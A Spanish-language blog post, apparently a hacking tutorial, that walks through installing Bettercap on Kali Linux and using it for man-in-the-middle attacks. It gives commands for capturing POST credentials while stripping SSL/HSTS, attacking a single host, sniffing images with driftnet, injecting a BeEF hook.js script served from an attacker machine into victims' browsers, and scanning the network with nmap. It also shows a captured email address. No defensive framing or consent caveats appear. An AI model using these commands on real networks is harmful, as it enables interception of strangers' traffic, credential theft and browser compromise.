Saludos mis fieles lectores en esta oportunidad aprenderemos a realizar un ataque MITM y manipular el trafico de paquetes burlando la seguridad SSL de algunas plataformas.
¿Que es Bettercap?
Es una herramienta potente, flexible y portátil creada para realizar varios tipos de ataques MITM contra una red, manipular HTTP, HTTPS y tráfico TCP en tiempo real, capturar las credenciales y mucho más.Referencia:
https://www.bettercap.org
Instalación:
Instalaremos la dependencias, librerías gems de ruby y instalaremos desde los repositorios oficiales de Kali Linux.
root@kali:~# sudo apt-get install build-essential ruby-dev libpcap-dev
root@kali:~# apt-get update
root@kali:~# apt-get install bettercap
Otro metodo de instalación es mediante gem:
root@kali:~# gem install bettercap
Si deseas actualizar a una versión nueva ejecutas lo siguiente:
root@kali:~# gem update bettercap
En algunas oportunidades si ejecutamos desde la terminal bettercap nos arrojaría un error, para repararlo lo recomendable es bajar el repositorio de Github y proceder manualmente:
root@kali:~# git clone https://github.com/evilsocket/bettercap
root@kali:~# cd bettercap
root@kali:~# gem build bettercap.gemspec
root@kali:~# sudo gem install bettercap*.gem
Si persiste el error debe fijarse si tiene la ultima versión de Ruby y Bundle simplemente:
root@kali:~# apt-get upgrade && gem install bundler
Luego de configurar correctamente bettercap pasaremos a ejecutarlo:
root@kali:~# sudo bettercap --proxy -P POST
En escenario hemos elegido capturar todos los paquetes de los dispositivos que se conecten a nuestra red bypasseando el protocolo SSL/HSTS de los servidores web protegidos.
Victima:
Podemos observar que hemos capturado un correo hotmail.com, también podemos utilizar driftnet para ver las imágenes de las webs visitadas.
root@kali:~# driftnet -i wlan0 ( en mi caso estoy conectado desde Wi-Fi ) si usted esta desde un cable de red es "eth0"
De igual manera pueden ejecutar un ataque de direccionamiento con un Payload o un JS de BeEF infectando a tu victima mediante su navegador.
root@kali:~# bettercap --proxy-module --js-url http://192.168.1.2:3100/hook.js
Si usted desea ejecutar un ataque dirigido a un HOST especifico puede ejecutar lo siguiente:
root@kali:~# bettercap -T 192.168.1.4 --proxy -P POST
Si desea saber que dispositivos están conectados a su red puede realizar un mapeo de redes con nmap mediante su rango:
root@kali:~# nmap -sS -v -O 192.168.1.1/24
POST BeEF:
https://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html
POST Nmap:
https://www.backtrackomar.com/2014/04/aprendiendo-nmap-nivel-basico.html
! Saludos !, ahora si hasta mas tarde mi fiel lector son las 4:54 de la mañana acá en Perú y este servidor tiene sueño jaja.
0 comentarios:
Publicar un comentario